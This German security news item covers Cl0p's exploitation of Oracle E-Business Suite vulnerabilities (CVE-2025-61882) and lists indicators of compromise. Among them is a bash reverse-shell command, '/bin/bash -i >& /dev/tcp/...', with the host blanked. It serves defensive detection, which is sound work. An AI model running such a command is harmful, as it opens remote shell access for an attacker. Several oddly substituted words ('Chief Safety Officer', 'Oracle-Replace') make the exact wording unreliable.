HomeVulnerabilityCl0p nutzt Schwachstelle bei Oracle aus

Cl0p nutzt Schwachstelle bei Oracle aus

Laut Rob Duhart, Chief Safety Officer von Oracle, sollten Unternehmen auf Indikatoren für eine Kompromittierung (IoCs) achten. Die folgenden IP-Adressen und Artefakte deuteten dabei auf eine mögliche Beteiligung der Scattered LAPSUS$ Hunters-Gruppe an dem Exploit hin:

  • 200.107.207[.]26 (Potenzielle GET- und POST-Aktivität)
  • 185.181.60[.]11 (Potenzielle GET- und POST-Aktivität)
  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Herstellen einer ausgehenden TCP-Verbindung über eine bestimmte port)
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Kompromittierung per Mail

Der Sicherheitsanbieter Mandiant beschreibt die Breaches als eine „huge E-Mail-Kampagne“, die von Hunderten kompromittierten Konten aus gestartet wurde. „Cl0p nutzte mehrere Schwachstellen in Oracle EBS aus und konnte so im August 2025 große Datenmengen von mehreren Opfern stehlen“, erklärte Charles Carmakal, CTO von Mandiant, in einem LinkedIn-Submit.

Er fügte hinzu, dass mehrere Schwachstellen ausgenutzt wurden, darunter „Schwachstellen, die im Oracle-Replace vom Juli 2025 gepatcht wurden, sowie eine, die an diesem Wochenende gepatcht wurde (CVE-2025-61882).“

See also  What are zero-day assaults and why do they work?
- Advertisment -spot_img
RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular